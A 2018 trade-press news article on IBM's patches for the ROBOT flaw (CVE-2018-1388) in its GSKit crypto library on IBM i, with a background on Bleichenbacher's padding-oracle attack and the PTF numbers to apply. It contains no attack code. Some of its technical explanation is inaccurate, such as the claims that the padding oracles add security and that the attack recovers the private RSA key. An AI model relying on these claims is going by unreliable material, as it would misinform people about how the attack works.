IBM Patches ‘ROBOT’ Flaw in IBM i Crypto Library
February 21, 2018 Alex Woodie
IBM has issued patches to fix a serious security problem in the IBM Global Security Kit, or GSKit, a relatively obscure crypto package that implements SSL/TLS encryption algorithms across a variety of IBM products, including IBM i. An old flaw in the underlying RSA crypto algorithm that could let hackers decrypt data in a “side channel” attack has resurfaced under a new moniker: “ROBOT.”
GSKit is an IBM toolkit that implements various encryption-related functions, including symmetric and asymmetric ciphers, random number generation, hashing algorithms, and encryption key management capabilities, for products that need over-the-wire encryption, including IBM i, Linux, and AIX operating systems, and WebSphere MQ, WebSphere Application Server, Db2 database, and Tivoli middleware. In addition to providing a crypto library, it provides command-line tools for implementing SSL/TLS encryption.
One of the components of GSKit is PKCS#1, the first family of Public-Key Cryptography Standards published by RSA Laboratories, which defines and implements the basic definitions and mathematical properties for public-key cryptography. Because the RSA algorithms cannot be securely implemented as they were originally written, “padding” must be added so they fill the block. This PKCS padding included so-called “oracles” designed to make the implementation more secure.
The whole GSKit package, including PKCS padding, is FIPS 140-2 certified, giving customers the confidence to use it. However, serious problems have been discovered in that PKCS padding.
Back in 1998, a security researcher named Daniel Bleichenbacher discovered that he could gain access to data that was encrypted with Secure Sockets Layer (SSL), which at the time was the industry standard for encrypting a stream of data on a network. Bleichenbacher found that by using the error messages generated by the SSL server itself, he could launch an “adaptive-chosen ciphertext” attack to crack it.
The practical implementation of the flaw allowed an attacker to passively record traffic and decrypt it later, what’s called a “side-channel” attack. The attackers would do this by using invalid PKCS padding and then analyzing the TLS error messages that come off of it, which would allow them to figure out the private RSA key that decrypts data.
However, instead of fixing the side-channel problem in a straightforward fashion, the designers of SSL decided to build add-ons that were basically workarounds. The counter-measures added to PKCS#1 became part of Transport Layer Security (TLS), the follow-on to SSL that was first described in 1999, and which is today a standard method for protecting data passed across HTTP, FTP, and other Internet protocols.
While stronger versions of PKCS padding have been devised and implemented as PKCS#1 version 2.2, they’re not in widespread use. That leaves organizations to use the older standard, but the increasingly complex workarounds required to secure it left some RSA implementations exposed.
In December, a group of security researchers discovered that, by using a variation of Bleichenbacher’s technique, they could hack the contents of modern HTTPS servers that were using the latest TLS standard. Hanno Böck, Juraj Somorovsky, and Craig Young called it Return Of Bleichenbacher’s Oracle Threat, or ROBOT.
“Some of the most popular webpages on the Internet were affected, including Facebook and Paypal,” the researchers wrote on their website, called The ROBOT Attack. “In total, we found vulnerable subdomains on 27 of the top 100 domains as ranked by Alexa.”
The researchers also identified a handful of hardware and software vendors whose implementations of PKCS#1 make their customers vulnerable to side-channel attacks. In addition to IBM, impacted vendors listed on the ROBOT Attack website include Citrix Systems, F5 Networks, Cisco Systems, and Palo Alto Networks, among others.
On February 1, the IBM GSKit security vulnerability was given a Common Vulnerabilities and Exposures number CVE-2018-1388. Owing to the high potential for damage to the confidentiality and integrity of data, and the low attack complexity associated with potential exploits, CVE gave the flaw a CVSS base score of 9.1, which is very high.
According to this security bulletin that was published on January 15, IBM had issued PTFs that address the flaw in IBM i 7.1, 7.2, and 7.3. On February 6, IBM issued a security bulletin alerting IBM i users to the flaw and telling them about the availability of the patches. Three days later, it published a post on the Product Security Incident Response (PSIRT) blog alerting users to the security bulletin and the patches.
All three supported versions of IBM i are affected. IBM recommends that IBM i customers immediately apply the following PTFs to fix the ROBOT flaw:
IBM i 7.1 — MF64537
IBM i 7.2 — MF64536
IBM i 7.3 — MF64534
In its APAR for the ROBOT attack published in January, IBM says every release of the IBM i operating system going back to i5/OS V5R1 is impacted by the ROBOT vulnerability in GSKit. However, IBM did not issue any patches for the older OSes. The only way to protect against the ROBOT vulnerability is to stop using the RSA ciphers, which is something that it recommends users of IBM 7.2 and 7.3 do anyway.
In addition to patching IBM i, IBM patched several releases of WebSphere MQ to address the GSKit vulnerabilities.